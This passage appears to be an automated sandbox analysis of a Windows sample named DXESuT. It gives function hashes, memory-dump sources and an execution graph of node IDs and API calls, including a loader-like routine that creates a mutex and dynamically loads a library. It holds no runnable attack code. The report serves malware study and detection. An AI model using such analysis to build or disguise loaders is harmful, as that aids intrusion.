                                                                          • Instruction Fuzzy Hash: 6AA14670A00606EFDF14CFA9D880AAEB7B5FF4970AB1481A9E455EB351D730EE51CB90

                                                                          Non-executed Functions

                                                                          Function 053F00CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37242518060.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_53f0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: l$ntdl
                                                                          • API String ID: 0-924918826
                                                                          • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                          • Instruction ID: 2a126e6f5c0bb6f51e03d6519d158143c28bf79debf919b2bcfb9199923ca7b2
                                                                          • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                          • Instruction Fuzzy Hash: 201160B5701602AFCB19EF18C50CA0EBBF6FF88750B218159E10697761FB35DA218BD5
                                                                          Function 02D900CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37248288418.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_2d90000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: l$ntdl
                                                                          • API String ID: 0-924918826
                                                                          • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                          • Instruction ID: e00ad2302e0bd22587e5319ddd40aa67dd814c3446f6cb6d31c92aac2717376c
                                                                          • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                          • Instruction Fuzzy Hash: 8E115BB5B01A01AFCB15AF18D408A0EBBF6FF88751B218159E109D7750EB35AE21CBE5
                                                                          Function 053F0643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37242518060.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_53f0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: l$ntdl
                                                                          • API String ID: 0-924918826
                                                                          • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                          • Instruction ID: 889d5938f7547e281ddd98e65ba485753747a620055527c82a18df504eb78369
                                                                          • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                          • Instruction Fuzzy Hash: 5E018871700118AFCB04DF9DC849DAEFBB9EF84654F044059FA05A7351DA70DE008B91
                                                                          Function 02D90643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000003.37248288418.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_3_2d90000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: l$ntdl
                                                                          • API String ID: 0-924918826
                                                                          • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                          • Instruction ID: 61d1d656052ebb4fdbe47498fb298eeb42417fcb1519b172ef890d53b9081343
                                                                          • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                          • Instruction Fuzzy Hash: 5F016171B00214AFCF04AB99D8459AEFBB9EF88655F044099F904A7360DB70DE008BA1

                                                                          Execution Graph

                                                                          Execution Coverage:6%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:1.3%
                                                                          Total number of Nodes:1042
                                                                          Total number of Limit Nodes:29
                                                                          execution_graph 3964 a67c8 RtlUnwind 3926 a122e 3929 a18fe 3926->3929 3930 a22cc 66 API calls 3929->3930 3931 a123f 3930->3931 3856 a458d 3859 a29c6 LeaveCriticalSection 3856->3859 3858 a4594 3859->3858 3965 a1242 3966 a1251 3965->3966 3967 a1257 3965->3967 3968 a1697 66 API calls 3966->3968 3971 a16bc 3967->3971 3968->3967 3970 a125c 3972 a1555 66 API calls 3971->3972 3973 a16c7 3972->3973 3973->3970 3860 a1281 3863 a283c 3860->3863 3862 a1286 3862->3862 3864 a286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3863->3864 3865 a2861 3863->3865 3866 a2865 3864->3866 3865->3864 3865->3866 3866->3862 3974 a4247 3984 a41cb 3974->3984 3977 a4272 3978 a10cc 5 API calls 3977->3978 3980 a442a 3978->3980 3979 a42b6 IsValidCodePage 3979->3977 3981 a42c8 GetCPInfo 3979->3981 3981->3977 3982 a42db 3981->3982 3991 a3f0d GetCPInfo 3982->3991 4001 a4144 3984->4001 3987 a41ea GetOEMCP 3990 a41fa 3987->3990 3988 a4208 3989 a420d GetACP 3988->3989 3988->3990 3989->3990 3990->3977 3990->3979 3990->3982 3994 a3f41 3991->3994 4000 a3ff3 3991->4000 4212 a5fe2 3994->4212 3996 a10cc 5 API calls 3998 a409e 3996->3998 3998->3982 3999 a6415 101 API calls 3999->4000 4000->3996 4002 a4157 4001->4002 4005 a41a4 4001->4005 4003 a2345 66 API calls 4002->4003 4004 a415c 4003->4004 4007 a4184 4004->4007 4009 a3e04 4004->4009 4005->3987 4005->3988 4007->4005 4024 a40a0 4007->4024 4010 a3e10 4009->4010 4011 a2345 66 API calls 4010->4011 4012 a3e15 4011->4012 4013 a3e43 4012->4013 4015 a3e27 4012->4015 4014 a2aa0 66 API calls 4013->4014 4017 a3e4a 4014->4017 4016 a2345 66 API calls 4015->4016 4018 a3e2c 4016->4018 4040 a3dc6 4017->4040 4021 a3e3a 4018->4021 4023 a1411 66 API calls 4018->4023 4021->4007 4023->4021 4025 a40ac 4024->4025 4026 a2345 66 API calls 4025->4026 4027 a40b1 4026->4027 4028 a2aa0 66 API calls 4027->4028 4036 a40c3 4027->4036 4029 a40e1 4028->4029 4030 a412a 4029->4030 4034 a40f8 InterlockedDecrement 4029->4034 4035 a4112 InterlockedIncrement 4029->4035 4208 a413b 4030->4208 4031 a1411 66 API calls 4033 a40d1 4031->4033 4033->4005 4034->4035 4037 a4103 4034->4037 4035->4030 4036->4031 4036->4033 4037->4035 4038 a35ee 66 API calls 4037->4038 4039 a4111 4038->4039 4039->4035 4041 a3dca 4040->4041 4042 a3dfc 4040->4042 4041->4042 4043 a3c9e 8 API calls 4041->4043 4048 a3e6e 4042->4048 4044 a3ddd 4043->4044 4044->4042 4051 a3d2d 4044->4051 4207 a29c6 LeaveCriticalSection 4048->4207 4050 a3e75 4050->4018 4052 a3d3e InterlockedDecrement 4051->4052 4053 a3dc1 4051->4053 4054 a3d53 InterlockedDecrement 4052->4054 4055 a3d56 4052->4055 4053->4042 4065 a3b55 4053->4065 4054->4055 4056 a3d63 4055->4056 4057 a3d60 InterlockedDecrement 4055->4057 4058 a3d6d InterlockedDecrement 4056->4058 4059 a3d70 4056->4059 4057->4056 4058->4059 4060 a3d7a InterlockedDecrement 4059->4060 4062 a3d7d 4059->4062 4060->4062 4061 a3d96 InterlockedDecrement 4061->4062 4062->4061 4063 a3db1 InterlockedDecrement 4062->4063 4064 a3da6 InterlockedDecrement 4062->4064 4063->4053 4064->4062 4066 a3bd9 4065->4066 4068 a3b6c 4065->4068 4067 a3c26 4066->4067 4069 a35ee 66 API calls 4066->4069 4081 a3c4d 4067->4081 4119 a5ae1 4067->4119 4068->4066 4076 a35ee 66 API calls 4068->4076 4078 a3ba0 4068->4078 4071 a3bfa 4069->4071 4073 a35ee 66 API calls 4071->4073 4079 a3c0d 4073->4079 4074 a35ee 66 API calls 4080 a3bce 4074->4080 4075 a35ee 66 API calls 4075->4081 4082 a3b95 4076->4082 4077 a3c92 4083 a35ee 66 API calls 4077->4083 4084 a35ee 66 API calls 4078->4084 4094 a3bc1 4078->4094 4086 a35ee 66 API calls 4079->4086 4087 a35ee 66 API calls 4080->4087 4081->4077 4085 a35ee 66 API calls 4081->4085 4095 a5cbb 4082->4095 4089 a3c98 4083->4089 4090 a3bb6 4084->4090 4085->4081 4091 a3c1b 4086->4091 4087->4066 4089->4042 4111 a5c76 4090->4111 4093 a35ee 66 API calls 4091->4093 4093->4067 4094->4074 4096 a5cc8 4095->4096 4110 a5d45 4095->4110 4097 a35ee 66 API calls 4096->4097 4099 a5cd9 4096->4099 4097->4099 4098 a5ceb 4101 a5cfd 4098->4101 4103 a35ee 66 API calls 4098->4103 4099->4098 4100 a35ee 66 API calls 4099->4100 4100->4098 4102 a5d0f 4101->4102 4104 a35ee 66 API calls 4101->4104 4105 a5d21 4102->4105 4106 a35ee 66 API calls 4102->4106 4103->4101 4104->4102 4107 a5d33 4105->4107 4108 a35ee 66 API calls 4105->4108 4106->4105 4109 a35ee 66 API calls 4107->4109 4107->4110 4108->4107 4109->4110 4110->4078 4112 a5c83 4111->4112 4118 a5cb7 4111->4118 4113 a5c93 4112->4113 4114 a35ee 66 API calls 4112->4114 4115 a35ee 66 API calls 4113->4115 4116 a5ca5 4113->4116 4114->4113 4115->4116 4117 a35ee 66 API calls 4116->4117 4116->4118 4117->4118 4118->4094 4120 a5af2 4119->4120 4121 a3c46 4119->4121 4122 a35ee 66 API calls 4120->4122 4121->4075 4123 a5afa 4122->4123 4124 a35ee 66 API calls 4123->4124 4125 a5b02 4124->4125 4126 a35ee 66 API calls 4125->4126 4127 a5b0a 4126->4127 4128 a35ee 66 API calls 4127->4128 4129 a5b12 4128->4129 4130 a35ee 66 API calls 4129->4130 4131 a5b1a 4130->4131 4132 a35ee 66 API calls 4131->4132 4133 a5b22 4132->4133 4134 a35ee 66 API calls 4133->4134 4135 a5b29 4134->4135 4136 a35ee 66 API calls 4135->4136 4137 a5b31 4136->4137 4138 a35ee 66 API calls 4137->4138 4139 a5b39 4138->4139 4140 a35ee 66 API calls 4139->4140 4141 a5b41 4140->4141 4142 a35ee 66 API calls 4141->4142 4143 a5b49 4142->4143 4144 a35ee 66 API calls 4143->4144 4145 a5b51 4144->4145 4146 a35ee 66 API calls 4145->4146 4147 a5b59 4146->4147 4148 a35ee 66 API calls 4147->4148 4149 a5b61 4148->4149 4150 a35ee 66 API calls 4149->4150 4151 a5b69 4150->4151 4152 a35ee 66 API calls 4151->4152 4153 a5b71 4152->4153 4154 a35ee 66 API calls 4153->4154 4155 a5b7c 4154->4155 4156 a35ee 66 API calls 4155->4156 4157 a5b84 4156->4157 4158 a35ee 66 API calls 4157->4158 4159 a5b8c 4158->4159 4160 a35ee 66 API calls 4159->4160 4161 a5b94 4160->4161 4162 a35ee 66 API calls 4161->4162 4163 a5b9c 4162->4163 4164 a35ee 66 API calls 4163->4164 4165 a5ba4 4164->4165 4166 a35ee 66 API calls 4165->4166 4167 a5bac 4166->4167 4168 a35ee 66 API calls 4167->4168 4169 a5bb4 4168->4169 4170 a35ee 66 API calls 4169->4170 4171 a5bbc 4170->4171 4172 a35ee 66 API calls 4171->4172 4173 a5bc4 4172->4173 4174 a35ee 66 API calls 4173->4174 4175 a5bcc 4174->4175 4176 a35ee 66 API calls 4175->4176 4177 a5bd4 4176->4177 4178 a35ee 66 API calls 4177->4178 4179 a5bdc 4178->4179 4180 a35ee 66 API calls 4179->4180 4181 a5be4 4180->4181 4182 a35ee 66 API calls 4181->4182 4183 a5bec 4182->4183 4184 a35ee 66 API calls 4183->4184 4185 a5bf4 4184->4185 4186 a35ee 66 API calls 4185->4186 4187 a5c02 4186->4187 4188 a35ee 66 API calls 4187->4188 4189 a5c0d 4188->4189 4190 a35ee 66 API calls 4189->4190 4191 a5c18 4190->4191 4192 a35ee 66 API calls 4191->4192 4193 a5c23 4192->4193 4194 a35ee 66 API calls 4193->4194 4195 a5c2e 4194->4195 4196 a35ee 66 API calls 4195->4196 4197 a5c39 4196->4197 4198 a35ee 66 API calls 4197->4198 4199 a5c44 4198->4199 4200 a35ee 66 API calls 4199->4200 4201 a5c4f 4200->4201 4202 a35ee 66 API calls 4201->4202 4203 a5c5a 4202->4203 4204 a35ee 66 API calls 4203->4204 4205 a5c65 4204->4205 4206 a35ee 66 API calls 4205->4206 4206->4121 4207->4050 4211 a29c6 LeaveCriticalSection 4208->4211 4210 a4142 4210->4036 4211->4210 4213 a4144 76 API calls 4212->4213 4214 a5ff5 4213->4214 4222 a5e28 4214->4222 4217 a6415 4218 a4144 76 API calls 4217->4218 4219 a6428 4218->4219 4310 a6070 4219->4310 4223 a5e49 GetStringTypeW 4222->4223 4224 a5e74 4222->4224 4225 a5e69 GetLastError 4223->4225 4226 a5e61 4223->4226 4224->4226 4227 a5f5b 4224->4227 4225->4224 4228 a5ead MultiByteToWideChar 4226->4228 4230 a5f55 4226->4230 4250 a6b1a GetLocaleInfoA 4227->4250 4228->4230 4231 a5eda 4228->4231 4232 a10cc 5 API calls 4230->4232 4238 a54b5 66 API calls 4231->4238 4245 a5eef 4231->4245 4234 a3fae 4232->4234 4234->4217 4235 a5fac GetStringTypeA 4235->4230 4237 a5fc7 4235->4237 4236 a5f28 MultiByteToWideChar 4241 a5f3e GetStringTypeW 4236->4241 4242 a5f4f 4236->4242 4243 a35ee 66 API calls 4237->4243 4238->4245 4241->4242 4246 a5446 4242->4246 4243->4230 4245->4230 4245->4236 4247 a5452 4246->4247 4248 a5463 4246->4248 4247->4248 4249 a35ee 66 API calls 4247->4249 4248->4230 4249->4248 4251 a6b48 4250->4251 4252 a6b4d 4250->4252 4254 a10cc 5 API calls 4251->4254 4281 a6b04 4252->4281 4255 a5f7f 4254->4255 4255->4230 4255->4235 4256 a6b63 4255->4256 4257 a6c2d 4256->4257 4258 a6ba3 GetCPInfo 4256->4258 4261 a10cc 5 API calls 4257->4261 4259 a6bba 4258->4259 4260 a6c18 MultiByteToWideChar 4258->4260 4259->4260 4262 a6bc0 GetCPInfo 4259->4262 4260->4257 4265 a6bd3 4260->4265 4263 a5fa0 4261->4263 4262->4260 4264 a6bcd 4262->4264 4263->4230 4263->4235 4264->4260 4264->4265 4266 a54b5 66 API calls 4265->4266 4270 a6c05 4265->4270 4266->4270 4267 a6c62 MultiByteToWideChar 4268 a6c7a 4267->4268 4269 a6c99 4267->4269 4272 a6c9e 4268->4272 4273 a6c81 WideCharToMultiByte 4268->4273 4271 a5446 66 API calls 4269->4271 4270->4257 4270->4267 4271->4257 4274 a6ca9 WideCharToMultiByte 4272->4274 4275 a6cbd 4272->4275 4273->4269 4274->4269 4274->4275 4276 a3730 66 API calls 4275->4276 4277 a6cc5 4276->4277 4277->4269 4278 a6cce WideCharToMultiByte 4277->4278 4278->4269 4279 a6ce0 4278->4279 4280 a35ee 66 API calls 4279->4280 4280->4269 4284 a6f7a 4281->4284 4285 a6f93 4284->4285 4288 a6d4b 4285->4288 4289 a4144 76 API calls 4288->4289 4292 a6d60 4289->4292 4290 a6d72 4291 a2c72 66 API calls 4290->4291 4293 a6d77 4291->4293 4292->4290 4295 a6daf 4292->4295 4294 a2c0a 6 API calls 4293->4294 4296 a6b15 4294->4296 4298 a6df4 4295->4298 4300 a69e5 4295->4300 4296->4251 4298->4296 4299 a2c72 66 API calls 4298->4299 4299->4296 4301 a4144 76 API calls 4300->4301 4302 a69f9 4301->4302 4303 a6a06 4302->4303 4307 a6acc 4302->4307 4303->4295 4306 a5fe2 90 API calls 4306->4303 4308 a4144 76 API calls 4307->4308 4309 a6a2e 4308->4309 4309->4306 4311 a6091 LCMapStringW 4310->4311 4314 a60ac 4310->4314 4312 a60b4 GetLastError 4311->4312 4311->4314 4312->4314 4313 a62aa 4317 a6b1a 90 API calls 4313->4317 4314->4313 4315 a6106 4314->4315 4316 a611f MultiByteToWideChar 4315->4316 4334 a62a1 4315->4334 4321 a614c 4316->4321 4316->4334 4320 a62d2 4317->4320 4318 a10cc 5 API calls 4319 a3fce 4318->4319 4319->3999 4322 a62eb 4320->4322 4323 a63c6 LCMapStringA 4320->4323 4320->4334 4330 a54b5 66 API calls 4321->4330 4338 a6165 4321->4338 4326 a6b63 73 API calls 4322->4326 4325 a6322 4323->4325 4324 a619d MultiByteToWideChar 4327 a6298 4324->4327 4328 a61b6 LCMapStringW 4324->4328 4329 a63ed 4325->4329 4333 a35ee 66 API calls 4325->4333 4331 a62fd 4326->4331 4336 a5446 66 API calls 4327->4336 4328->4327 4332 a61d7 4328->4332 4329->4334 4339 a35ee 66 API calls 4329->4339 4330->4338 4331->4334 4335 a6307 LCMapStringA 4331->4335 4337 a61e0 4332->4337 4343 a6209 4332->4343 4333->4329 4334->4318 4335->4325 4341 a6329 4335->4341 4336->4334 4337->4327 4340 a61f2 LCMapStringW 4337->4340 4338->4324 4338->4334 4339->4334 4340->4327 4344 a633a 4341->4344 4345 a54b5 66 API calls 4341->4345 4342 a6258 LCMapStringW 4346 a6292 4342->4346 4347 a6270 WideCharToMultiByte 4342->4347 4348 a6224 4343->4348 4349 a54b5 66 API calls 4343->4349 4344->4325 4351 a6378 LCMapStringA 4344->4351 4345->4344 4350 a5446 66 API calls 4346->4350 4347->4346 4348->4327 4348->4342 4349->4348 4350->4327 4353 a6398 4351->4353 4354 a6394 4351->4354 4355 a6b63 73 API calls 4353->4355 4356 a5446 66 API calls 4354->4356 4355->4354 4356->4325 3175 a1104 3212 a264c 3175->3212 3177 a1110 GetStartupInfoW 3178 a1133 3177->3178 3213 a261b HeapCreate 3178->3213 3181 a1183 3215 a248e GetModuleHandleW 3181->3215 3185 a10db 66 API calls 3186 a1194 3185->3186 3249 a1dde 3186->3249 3188 a11a2 3189 a11ae GetCommandLineW 3188->3189 3321 a1411 3188->3321 3264 a1d81 GetEnvironmentStringsW 3189->3264 3193 a11bd 3271 a1cd3 GetModuleFileNameW 3193->3271 3196 a11d2 3277 a1aa4 3196->3277 3197 a1411 66 API calls 3197->3196 3200 a11e3 3290 a14d0 3200->3290 3201 a1411 66 API calls 3201->3200 3203 a11ea 3204 a1411 66 API calls 3203->3204 3205 a11f5 3203->3205 3204->3205 3296 a1000 CoInitialize CreateMutexW 3205->3296 3207 a1216 3208 a1224 3207->3208 3310 a1681 3207->3310 3328 a16ad 3208->3328 3211 a1229 3212->3177 3214 a1177 3213->3214 3214->3181 3313 a10db 3214->3313 3216 a24a9 3215->3216 3217 a24a2 3215->3217 3219 a24b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3216->3219 3220 a2611 3216->3220 3331 a13e1 3217->3331 3222 a24fc TlsAlloc 3219->3222 3390 a21a8 3220->3390 3225 a1189 3222->3225 3226 a254a TlsSetValue 3222->3226 3225->3185 3225->3186 3226->3225 3227 a255b 3226->3227 3335 a16cb 3227->3335 3232 a207e 6 API calls 3233 a257b 3232->3233 3234 a207e 6 API calls 3233->3234 3235 a258b 3234->3235 3236 a207e 6 API calls 3235->3236 3237 a259b 3236->3237 3352 a2924 3237->3352 3244 a20f9 6 API calls 3245 a25ef 3244->3245 3245->3220 3246 a25f6 3245->3246 3372 a21e5 3246->3372 3248 a25fe GetCurrentThreadId 3248->3225 3717 a264c 3249->3717 3251 a1dea GetStartupInfoA 3252 a3730 66 API calls 3251->3252 3258 a1e0b 3252->3258 3253 a2029 3253->3188 3254 a1fa6 GetStdHandle 3263 a1f70 3254->3263 3255 a200b SetHandleCount 3255->3253 3256 a3730 66 API calls 3256->3258 3257 a1fb8 GetFileType 3257->3263 3258->3253 3258->3256 3260 a1ef3 3258->3260 3258->3263 3259 a1f1c GetFileType 3259->3260 3260->3253 3260->3259 3262 a317c InitializeCriticalSectionAndSpinCount 3260->3262 3260->3263 3261 a317c InitializeCriticalSectionAndSpinCount 3261->3263 3262->3260 3263->3253 3263->3254 3263->3255 3263->3257 3263->3261 3265 a1d92 3264->3265 3268 a1d96 3264->3268 3265->3193 3267 a36eb 66 API calls 3269 a1db7 3267->3269 3268->3267 3270 a1dbe FreeEnvironmentStringsW 3269->3270 3270->3193 3272 a1d08 3271->3272 3273 a11c7 3272->3273 3274 a1d45 3272->3274 3273->3196 3273->3197 3275 a36eb 66 API calls 3274->3275 3276 a1d4b 3275->3276 3276->3273 3278 a1abc 3277->3278 3282 a11d8 3277->3282 3279 a3730 66 API calls 3278->3279 3285 a1ae0 3279->3285 3280 a1b45 3281 a35ee 66 API calls 3280->3281 3281->3282 3282->3200 3282->3201 3283 a3730 66 API calls 3283->3285 3284 a1b6b 3287 a35ee 66 API calls 3284->3287 3285->3280 3285->3282 3285->3283 3285->3284 3288 a1b2a 3285->3288 3718 a367c 3285->3718 3287->3282 3288->3285 3289 a2ae2 10 API calls 3288->3289 3289->3288 3292 a14de 3290->3292 3727 a2dc3 3292->3727 3293 a14fc 3295 a151b 3293->3295 3731 a2dac 3293->3731 3295->3203 3297 a101f GetLastError 3296->3297 3298 a1035 GetCommandLineW CommandLineToArgvW 3296->3298 3297->3298 3299 a102c 3297->3299 3300 a1056 PathFileExistsW 3298->3300 3305 a1067 3298->3305 3299->3207 3302 a106e PathFileExistsW 3300->3302 3300->3305 3301 a1084 LoadLibraryW 3303 a10aa CloseHandle CoUninitialize 3301->3303 3304 a1091 GetProcAddress 3301->3304 3302->3301 3302->3305 3308 a10bb LocalFree 3303->3308 3309 a10c2 3303->3309 3306 a10a3 FreeLibrary 3304->3306 3307 a10a1 3304->3307 3305->3301 3306->3303 3307->3306 3308->3309 3309->3207 3831 a1555 3310->3831 3312 a1692 3312->3208 3314 a10e9 3313->3314 3315 a10ee 3313->3315 3316 a18c4 66 API calls 3314->3316 3317 a1719 66 API calls 3315->3317 3316->3315 3318 a10f6 3317->3318 3319 a1465 3 API calls 3318->3319 3320 a1100 3319->3320 3320->3181 3322 a18c4 66 API calls 3321->3322 3323 a141b 3322->3323 3324 a1719 66 API calls 3323->3324 3325 a1423 3324->3325 3326 a20f9 6 API calls 3325->3326 3327 a11ad 3326->3327 3327->3189 3329 a1555 66 API calls 3328->3329 3330 a16b8 3329->3330 3330->3211 3332 a13ec Sleep GetModuleHandleW 3331->3332 3333 a140a 3332->3333 3334 a140e 3332->3334 3333->3332 3333->3334 3334->3216 3401 a20f0 3335->3401 3337 a16d3 3404 a2913 3337->3404 3340 a207e 6 API calls 3341 a170f 3340->3341 3342 a207e TlsGetValue 3341->3342 3343 a2096 3342->3343 3344 a20b7 GetModuleHandleW 3342->3344 3343->3344 3347 a20a0 TlsGetValue 3343->3347 3345 a20d2 GetProcAddress 3344->3345 3346 a20c7 3344->3346 3349 a20af 3345->3349 3348 a13e1 2 API calls 3346->3348 3350 a20ab 3347->3350 3351 a20cd 3348->3351 3349->3232 3350->3344 3350->3349 3351->3345 3351->3349 3353 a292f 3352->3353 3355 a25a8 3353->3355 3407 a317c 3353->3407 3355->3220 3356 a20f9 TlsGetValue 3355->3356 3357 a2132 GetModuleHandleW 3356->3357 3358 a2111 3356->3358 3360 a214d GetProcAddress 3357->3360 3361 a2142 3357->3361 3358->3357 3359 a211b TlsGetValue 3358->3359 3364 a2126 3359->3364 3363 a212a 3360->3363 3362 a13e1 2 API calls 3361->3362 3365 a2148 3362->3365 3363->3220 3366 a3730 3363->3366 3364->3357 3364->3363 3365->3360 3365->3363 3368 a3739 3366->3368 3369 a25d5 3368->3369 3370 a3757 Sleep 3368->3370 3412 a557f 3368->3412 3369->3220 3369->3244 3371 a376c 3370->3371 3371->3368 3371->3369 3696 a264c 3372->3696 3374 a21f1 GetModuleHandleW 3375 a2201 3374->3375 3380 a2207 3374->3380 3378 a13e1 2 API calls 3375->3378 3376 a221f GetProcAddress GetProcAddress 3377 a2243 3376->3377 3379 a2aa0 62 API calls 3377->3379 3378->3380 3381 a2262 InterlockedIncrement 3379->3381 3380->3376 3380->3377 3697 a22ba 3381->3697 3384 a2aa0 62 API calls 3385 a2283 3384->3385 3700 a3c9e InterlockedIncrement 3385->3700 3387 a22a1 3712 a22c3 3387->3712 3389 a22ae 3389->3248 3391 a21be 3390->3391 3392 a21b2 3390->3392 3394 a21d2 TlsFree 3391->3394 3395 a21e0 3391->3395 3393 a20f9 6 API calls 3392->3393 3393->3391 3394->3395 3396 a298b DeleteCriticalSection 3395->3396 3397 a29a3 3395->3397 3398 a35ee 66 API calls 3396->3398 3399 a29b5 DeleteCriticalSection 3397->3399 3400 a29c3 3397->3400 3398->3395 3399->3397 3400->3225 3402 a207e 6 API calls 3401->3402 3403 a20f7 3402->3403 3403->3337 3405 a207e 6 API calls 3404->3405 3406 a1705 3405->3406 3406->3340 3411 a264c 3407->3411 3409 a3188 InitializeCriticalSectionAndSpinCount 3410 a31cc 3409->3410 3410->3353 3411->3409 3413 a558b 3412->3413 3414 a55a3 3413->3414 3424 a55c2 3413->3424 3425 a2c72 3414->3425 3418 a5634 HeapAlloc 3418->3424 3421 a55b8 3421->3368 3424->3418 3424->3421 3431 a2aa0 3424->3431 3438 a4dc3 3424->3438 3444 a567b 3424->3444 3447 a31eb 3424->3447 3450 a22cc GetLastError 3425->3450 3427 a2c77 3428 a2c0a 3427->3428 3429 a20f9 6 API calls 3428->3429 3430 a2c1a 3429->3430 3432 a2ac8 EnterCriticalSection 3431->3432 3433 a2ab5 3431->3433 3432->3424 3492 a29dd 3433->3492 3435 a2abb 3435->3432 3436 a1411 65 API calls 3435->3436 3437 a2ac7 3436->3437 3437->3432 3441 a4df1 3438->3441 3439 a4e8a 3443 a4e93 3439->3443 3691 a49da 3439->3691 3441->3439 3441->3443 3684 a492a 3441->3684 3443->3424 3695 a29c6 LeaveCriticalSection 3444->3695 3446 a5682 3446->3424 3448 a20f9 6 API calls 3447->3448 3449 a31fb 3448->3449 3449->3424 3464 a2174 TlsGetValue 3450->3464 3453 a2339 SetLastError 3453->3427 3454 a3730 63 API calls 3455 a22f7 3454->3455 3455->3453 3456 a20f9 6 API calls 3455->3456 3457 a2311 3456->3457 3458 a2318 3457->3458 3459 a2330 3457->3459 3460 a21e5 63 API calls 3458->3460 3469 a35ee 3459->3469 3462 a2320 GetCurrentThreadId 3460->3462 3462->3453 3463 a2336 3463->3453 3465 a2189 3464->3465 3466 a21a4 3464->3466 3467 a20f9 6 API calls 3465->3467 3466->3453 3466->3454 3468 a2194 TlsSetValue 3467->3468 3468->3466 3471 a35fa 3469->3471 3470 a3673 3470->3463 3471->3470 3472 a3639 3471->3472 3474 a2aa0 64 API calls 3471->3474 3472->3470 3473 a364e HeapFree 3472->3473 3473->3470 3475 a3660 3473->3475 3479 a3611 3474->3479 3476 a2c72 64 API calls 3475->3476 3477 a3665 GetLastError 3476->3477 3477->3470 3478 a362b 3488 a3644 3478->3488 3479->3478 3482 a4614 3479->3482 3483 a4653 3482->3483 3487 a48f5 3482->3487 3484 a483f VirtualFree 3483->3484 3483->3487 3485 a48a3 3484->3485 3486 a48b2 VirtualFree HeapFree 3485->3486 3485->3487 3486->3487 3487->3478 3491 a29c6 LeaveCriticalSection 3488->3491 3490 a364b 3490->3472 3491->3490 3493 a29e9 3492->3493 3507 a2a0f 3493->3507 3518 a18c4 3493->3518 3499 a2a40 3503 a2aa0 66 API calls 3499->3503 3500 a2a31 3502 a2c72 66 API calls 3500->3502 3505 a2a1f 3502->3505 3506 a2a47 3503->3506 3505->3435 3508 a2a7b 3506->3508 3509 a2a4f 3506->3509 3507->3505 3564 a36eb 3507->3564 3510 a35ee 66 API calls 3508->3510 3511 a317c InitializeCriticalSectionAndSpinCount 3509->3511 3512 a2a6c 3510->3512 3513 a2a5a 3511->3513 3569 a2a97 3512->3569 3513->3512 3515 a35ee 66 API calls 3513->3515 3516 a2a66 3515->3516 3517 a2c72 66 API calls 3516->3517 3517->3512 3572 a35a3 3518->3572 3521 a35a3 66 API calls 3523 a18d8 3521->3523 3522 a1719 66 API calls 3524 a18f0 3522->3524 3523->3522 3525 a18fa 3523->3525 3526 a1719 66 API calls 3524->3526 3527 a1719 3525->3527 3526->3525 3528 a172d 3527->3528 3529 a35a3 63 API calls 3528->3529 3560 a1888 3528->3560 3530 a174f 3529->3530 3531 a188d GetStdHandle 3530->3531 3533 a35a3 63 API calls 3530->3533 3532 a189b 3531->3532 3531->3560 3536 a18b4 WriteFile 3532->3536 3532->3560 3534 a1760 3533->3534 3534->3531 3535 a1772 3534->3535 3535->3560 3578 a353b 3535->3578 3536->3560 3539 a17a8 GetModuleFileNameA 3541 a17c6 3539->3541 3545 a17e9 3539->3545 3543 a353b 63 API calls 3541->3543 3544 a17d6 3543->3544 3544->3545 3546 a2ae2 10 API calls 3544->3546 3556 a182c 3545->3556 3594 a33f0 3545->3594 3546->3545 3551 a2ae2 10 API calls 3554 a1850 3551->3554 3552 a337c 63 API calls 3555 a1864 3552->3555 3553 a2ae2 10 API calls 3553->3556 3554->3552 3557 a1875 3555->3557 3559 a2ae2 10 API calls 3555->3559 3603 a337c 3556->3603 3612 a3213 3557->3612 3559->3557 3561 a1465 3560->3561 3650 a143a GetModuleHandleW 3561->3650 3568 a36f4 3564->3568 3566 a2a2a 3566->3499 3566->3500 3567 a370b Sleep 3567->3568 3568->3566 3568->3567 3654 a54b5 3568->3654 3683 a29c6 